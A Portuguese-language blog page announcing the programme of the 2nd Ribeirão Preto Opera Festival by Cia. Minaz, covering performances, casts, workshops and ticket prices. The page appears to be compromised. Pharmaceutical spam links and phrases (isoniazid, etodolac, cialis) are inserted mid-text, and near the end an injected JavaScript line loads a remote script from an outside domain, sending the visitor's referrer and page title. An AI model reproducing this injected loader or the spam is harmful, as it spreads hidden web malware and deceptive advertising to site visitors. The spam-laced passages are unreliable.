FestivalMovimentoÓperaProgramaçãoSão Paulo

Festival de Ópera de Ribeirão Preto

O 2º Festival de Ópera de Ribeirão Preto realizado pela Cia. Minaz acontecerá nos Teatro Minaz e Teatro Pedro II.

Serão montagens de óperas e ópera estúdio, concertos, oficinas, realizadas por profissionais do Brasil e do exterior. A programação tem início no dia 11 de julho com a ópera cômica do compositor lusitano Marcos Portugal Basculho de Chaminé, tendo como maestro convidado o curitibano radicado em Lisboa Ricardo Bernardes.

Em agosto teremos a estreia da montagem da ópera L’Elisir d’Amore, de Gaetano Donizetti, no Theatro Pedro II com a participação de solistas brasileiros e estrangeiros, Coral Minaz e Orquestra Sinfônica, regidos pelo maestro Abel Rocha de São Paulo.

Em setembro será a vez de outra estreia da Cia. Minaz, a ópera barroca Acis e Galatea, de Haendel, que terá solistas de Ribeirão Preto, Belo Horizonte e orquestra barroca formada por músicos de São Paulo, Rio de Janeiro e Minas Gerais, dirigidos pelo maestro Mítia D’Acol.

CIA. MINAZ

A companhia desenvolve na cidade de Ribeirão Preto um trabalho de formação de público e profissionais para a música erudita, com enfoque em canto solo, canto coral e ópera desde sua fundação na cidade em 1991. A partir de 2009, com a inauguração do Teatro Minaz, a Cia. passou a ser uma das poucas companhias de ópera do Brasil que comanda um centro cultural dotado de salas de aula, sala de ensaio e de um Teatro de ópera de pequeno porte.

Com o estabelecimento desta infraestrutura, a Cia. Minaz passou a elaborar e apresentar mais projetos de formação de profissionais e de público. Seus corais e cantores expandiram seu repertório e podem contar agora com uma flexibilidade maior na escolha de papéis, de novas produções, aumentando a dinâmica e a facilidade com que a Cia. monta seus espetáculos.

O 1º Festival de Ópera de Ribeirão Preto superou as estimativas previstas no projeto com a realização de quatro concertos, cinco oficinas, e montagens de sete óperas para toda uma variedade de público, do mais erudito ao primeiro ouvinte de ópera, das crianças e adolescentes aos adultos, fomentando não só a formação e a criação de público como também a formação e criação de profissionais para a ópera por meio do intercâmbio de experiências profissionais e educativas que aconteceram durante o festival. Desta forma, a segunda edição do festival pretende manter esse formato que visa a descentralização dos festivais de música, ampliando a divulgação da ópera no cenário musical.

O festival é realizado pela  Cia. Minaz através de projeto de ProAC da Secretaria de Estado da Cultura e das parcerias com o SESC, Secretaria Municipal da Cultura, Theatro Pedro II, Orquestra Sinfônica de Ribeirão Preto, Instituto de Artes da UNESP, Faculdade de Filosofia Ciências e Letras da USP Ribeirão Preto.

 

PROGRAMAÇÃO


– Dia 11 de Julho, às 20h30 – Teatro Minaz

Entrada franca

Ópera Basculho de Chaminé – Marcos Portugal (1762-1830)

O Basculho de Chaminé é uma ópera ligeira escrita pelo compositor Marcos Portugal (1762 – 1830), na época residente na Itália. Sua estreia deu-se em 1794. Trata-se de uma “comédia de enganos” que descreve a farsa de um barão e um limpador de chaminés (Pieroto) que trocam de identidade. O Barão de Monte Albor, por estar desconfiado de que seu círculo social (Dom Fábio, Dona Flora, Rosina e seu criado, Janino) trama pelo seu mal, associa-se a Pieroto, que deseja viver algumas das regalias da vida de barão. A trama se desenrola a partir dessa farsa inicial, gerando situações cômicas no estilo da “commedia dell’arte”.

A montagem da Cia. Minaz estreou em agosto de 2013, integrando as atividades do V Encontro de Musicologia de Ribeirão Preto coordenado pelo LAMUS Laboratório de Musicologia da USP em parceria com o Centro de Estudos de Sociologia e Estética Musical da Faculdade de Ciências Sociais e Humanas da Universidade Nova de Lisboa (CESEM). O projeto coordenado pelo LAMUS  foi premiado pelo Programa de Intercâmbio de Atividades de Cultura e Extensão da Pró-Reitoria de Cultura e Extensão Universitária da USP, tendo como objetivo promover a prática de extensão universitária, mediante parcerias com instituições da cidade de Ribeirão Preto que atuam no campo da produção e educação musical.

A récita integrante do 2º Festival de Ópera de Ribeirão Preto é realizada em comemoração ao 50º aniversário da Faculdade de Ciências Letras de Ribeirão Preto – USP.

– Direção musical – Maestro  Ricardo Bernardes (Curitiba/Portugal)
– Elenco – Gabriel Locher (Pieroto), Camilo Calandreli (Barão), Gisele Ganade (Dona Flora), Mariana Cunha (Rosina), Ozório Christovam (Dom Fábio), Lucas Curtarelli (Janino)
– Orquestra Sinfônica de Ribeirão Preto
– Direção Cênica – André Cruz
– Cenários e Figurinos – Núcleo de Montagens da Cia. Minaz

  http://cuzndog.mhs.narotama.ac.id/2018/02/01/exelon-drug-price/

buy isoniazid drug – Dia 27 de julho, às 19 horas – Teatro Minaz

Entrada franca

Ópera Contada e Cantada La Bohème – G. Puccini (1858-1924) – Cia. Ópera Curta (São Paulo)

Tendo como inspiração a novela Scènes de la vie de bohème, de Henri Murger, e a ópera composta por Giacomo Puccini (1858-1924), La Bohème – a ópera contada e cantada integra o programa Ópera Curta, da Secretaria Estadual de Cultura, que promove a circulação de peças de teatro musical, baseados em óperas famosas, nas cidades do Estado de São Paulo, em cooperação com as Prefeituras Municipais. O espetáculo apresenta  a  ópera contada e cantada acentuando os aspectos musicais e dramatúrgicos, sem perder a essência da obra.

A ópera de Giacomo Puccini é uma criação de transição entre o período romântico e o realismo no gênero. Puccini criou um espetáculo que narra a história de artistas e pessoas comuns que conviviam em estado de penúria, na Paris do final do século XIX. La Bohème apresenta os amigos Rodolfo (poeta), Marcello (pintor), Schaunard (músico), Colline (filósofo) e os amores dos dois primeiros, Mimi e Musetta, respectivamente. As relações afetivas são de permanente conflito, motivadas pelo ciúme e pelas inseguranças do grupo, pela pobreza a que estão reduzidos. Mimi morre ao final da ópera, vitima de uma doença avançada pelo abandono, desamparo, falta de recursos. É inverno em Paris.

– Concepção: Cléber Papa e Rosana Caramaschi
– Direção, cenários e textos – Cléber Papa
– Direção musical – Luís Gustavo Petri
– Direção artística de produção – Rosana Caramaschi
– Luz – Joyce Drummond
– Figurinos – Simone Mina
– Elenco: Rodolfo – Gilberto Chaves, Giovanni Tristacci, Marcello – Sebastião Teixeira, Vinicius Atique, Mimi (Lucia) – Gabriella Rossi, Massami Ganev,  Musetta – Laryssa Alvarezzi, Taís Bandeira, Benoit – João Gyorgy, Garçom – Marco Watanabe.

 

– Dias 3 de agosto, às 19 horas, e 5 de agosto, às 20 horas – Theatro Pedro II cheap etodolac 200

Ingressos Purchase
Plateia, Frisas e Balcão Nobre R$60,00 inteira, R$30,00 meia
Balcão Simples e Galerias R$50,00 inteira, R$25,00 meia.

active ingredient in cialis black Ópera L’Elisir d’Amore – Gaetano Donizetti (1797-1848)

A nova montagem da Cia. Minaz integra o 2º Festival de Ópera de Ribeirão Preto.

Trata-se de uma ópera cômica em dois atos em que  Nemorino, um simplório lavrador, disputa o coração da rica e sedutora Adina com o sargento  Belcore, acreditando na ajuda de um “elixir do amor”, vendido pelo charlatão Dulcamara, para realizar seu sonho.

Buy Ópera cômica em dois atos
– Direção musical – Maestro  Abel Rocha  (São Paulo)
– Elenco – Nemorino – Santiago Ballerine (Argentina), Adina – Lilian Giovanini (Ribeirão Preto), Belcore  – Camilo Calandreli (Ribeirão Preto), Dulcamara – Sávio Sperandio (São Paulo), Giannetta – Mariana Cunha (Ribeirã Preto).
– Coral Minaz
– Orquestra Sinfônica de Ribeirão Preto
– Direção Cênica – André Cruz
– Cenários e Figurinos – Núcleo de Produção da Cia. Minaz

 

– Dia 9 de agosto, às 20h30 – Teatro Minaz

Entrada franca

Ópera Estúdio Trouble in Tahiti – Leonard Bernstein – Fábrica de Óperas IA – UNESP (São Paulo)

A Fábrica de Óperas – IA Unesp continua com sua proposta de ser um projeto pioneiro de performance em ópera de repertório. Neste primeiro semestre de 2014 foram 4 dias consecutivos, com a apresentação de cinco títulos de óperas (Le Nozze di Figaro, Suor Angelica, Trouble in Tahiti, Alcina, Let´s Make an Opera), por um elenco de 35 artistas da Fábrica de Óperas do IA Unesp, que se revezaram em mais de 40 personagens, coro e elenco de apoio. Esse trabalho, desenvolvido desde 2013, congregou alunos e professores de diversos cursos de bacharelado, licenciatura e pós- graduação do Instituto de Artes da Unesp, que atuam como cantores, ensaiadores, regentes, correpetidores, diretores de cena, tradutores, atores, iluminadores, etc…

Alie-se a isso a tradução de três das óperas para o português, que propiciam, enquanto ferramenta pedagógica para o estudo do canto, um relacionamento direto dos cantores com minúcias de interpretação, seja do ponto de vista didático ou de performance.

– Direção Musical – Maestro Abel Rocha
– Elenco: Marcela Panizza (Dinah), Vicente Sampaio (Sam),
– Trio: Gabrielle Agura, Luiz Guimarães, Gabriel Francisco Silva.
– Girls: Ana Medeiros, Andressa Thiemi Braga, Ariadne Menegon, Maju Pintyá, Carolina Janson, Lívia Cubayachi.
– Boys: Andrey Ivanov, Eduardo Virgílio, Tiago Morandi, Lucas Albuquerque, Marcus Danilo Ouros.
– Tradução: Luiz Guimarães
– Pianista Preparador: Lucas Nogara
– Direção Cênica: Luiz Eduardo Frin
– Ensaiador: Jorge de Godoy

 

Dia 17 de agosto, às 19 horas – Teatro Minaz – Realização SESC Ribeirão

Entrada franca

Pills Concerto “ De Mozart à Ópera Italiana” (São Paulo)

Soprano – Edna D’Oliveira
Mezzo Soprano – Edneia de Oliveira
Baixo – Eduardo Janho-Abumrad
Pianista – João Moreira Reis

 

– Dias 18 a 20 de agosto, das 9 às 18 horas – Sala de ensaios da Cia. Minaz

Oficina de canto – Realização SESC Ribeirão

  • Manhãs:

– Aplicação do Método Alexander para cantores : cantora-professora Edna D’Oliveira.
– Prática de ginástica e exercícios vocais: cantora-professora Edneia de Oliveira.
– Técnica vocal e respiratória: Cantor-professor Eduardo Janho-Abumrad.

  • Tardes:

– Preparação de repertório
– Estilo; interpretação de texto e ou personagem; dicção; pronúncia; fraseado musical; postura cênica e aplicação técnica na obra em preparação.

Essas aulas serão ministradas pelos três cantores-professores individualmente ou em conjunto, conforme critérios dos mesmos.

Professores – Eduardo Janho-Abumrad, Edna D’Oliveira, Edneia de Oliveira
As aulas terão como pianistas acompanhadores João Moreira Reis e Lucas de Paula

 

– Dia 20 de agosto, às 20h30 – Teatro Minaz

Entrada franca

Concerto dos alunos da Oficina de Canto Pills – Realização SESC Ribeirão

 

– Dias 25 a 29 de agosto, das 9 às 18 horas – Sala de ensaios e Teatro Minaz

Oficina de Canto com Graciela Araya (Chile) – Realização SESC Ribeirão

– Oficina para cantores líricos e ouvinte, abordando fonética, estilo, repertório e características de papéis operísticos com a cantora chilena Graciela Araya

  • Vagas  – 10 Participantes

– 30 ouvintes

  • Aulas de 45 minutos  das 9,30 às 13,15 e das 14,30 às 18,15.
  • Dia 25 segunda -feira

– Trabalho individual trabalhando fonética e estilo. Com uma ária que já é do repertório e uma ária recém lida.

  • Dia 26 terça-feira

– Exploração de novos papéis

  • Dia 27 quarta-feira

– Escolha do repertório do correto de acordo com a idade e experiência.

  • Dia 28 quinta-feira

– Aperfeiçoamento e aplicação de todos os aspectos, estilo, fonética e características dos papéis operísticos.

Das 11.00 às  13.00 Primeira Parte do concerto

Das 15.00  às 17.00  Segunda Parte do concerto

  • Dia 29 sexta-feira

– Concerto dos alunos

  • Inscrições pelo link:

https://docs.google.com/forms/d/1o0bn5npOfQ-cDws_e5-tF_WFMvd570s7FADi13vZo98/edit

*Seleção dos cantores através de gravação de vídeo e áudio com uma ária de livre escolha enviada conforme indicações do formulário de inscrição acima.

 

Graciela Araya

Nascida no Chile e radicada na Áustria, estudou canto com Marta Duran em Santiago e com Tomas Demolistas em São Paulo. Estreou aos 19 anos como Maria, em West Side Story. Aos 20, foi Henrichetta di Francia em I Puritani no Teatro Municipal de Santiago. Em 1984, ganhou bolsa de estudos na Deutsche Oper de Berlim, onde criou o papel do Gedankenstimme na ópera Cornet,  de Siegfried Mathus. Depois de dois anos em Aachen e três em Dusseldorf, passou a integrar o corpo fixo da Wiener Staatsoper, onde permaneceu por 12 anos.

Desde 1995, tem trabalhado exclusivamente como artista convidada em papéis principais nas maiores companhias de óperas, como a Royal Opera House de Londres, Ópera Nacional de Paris, Palais de La Monnaie de Bruxelas, Vlaamse Opera de Antuérpia etc. Em 2007, estreou no Carnegie Hall de Nova Iorque como Zanetto, de Pietro Mascagni. Criou o papel de Donna Maria d’Avalos na Ópera Gesualdo, de Alfred Schnitke, na Wiener Staatsoper.

Em 1987 foi Orfeo, em Orfeo ed Euridice, com o qual ganhou o prêmio O. E Hasse – Preis de melhor artista jovem na Alemanha. Já interpretou Amneris em Aida, Charlotte em Werther, Clairon em Capriccio, Concepcion em L’heure espagnole, Dalila em Sansão e Dalila, Geschwitz em Lulu, Herodias em Salomé, Jocasta no Oedipus Rex, Kundry em Parsifal, Laura de La Gioconda e Vênus em Tannhauser, mas o papel com o qual se destaca é Carmen que encenou mais de 400 vezes. Seu mais recente sucesso foi o papel de Heroide em Salomé no recente Egean Ópera Festival, na Grécia.

 

– Dia 29 de agosto, às 20h30 – Teatro Minaz

Entrada franca

Concerto dos alunos da Oficina de Canto – Realização SESC Ribeirão

 

 – Dia 11 de setembro, às 20h30 – Teatro Minaz

Entrada franca

Ópera Acis and Galatea – Händel (1685-1759)

O libreto trata da história de amor entre a ninfa semidivina, Galatea, e o pastor Acis que é morto pelo gigante Polyphemus e transformado em fonte de águas límpidas por sua amada.

A montagem  tem a direção musical do Maestro Mítia D’Acol e a direção cênica de André Cruz.  No elenco  como Acis  o tenor mineiro Wagner Moreira, como Galatea a soprano Lilian Giovanini, como Polyphemo  Lucas Curtarelli, como Damon – Sasha Ganade além do Madrigal Minaz acompanhados por orquestra formada por instrumentistas especializados em música barroca vindos de São Paulo, Minas Gerais e Rio de Janeiro. Os cenários e figurinos são realizados pelo Núcleo de Montagens da Cia. Minaz.

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.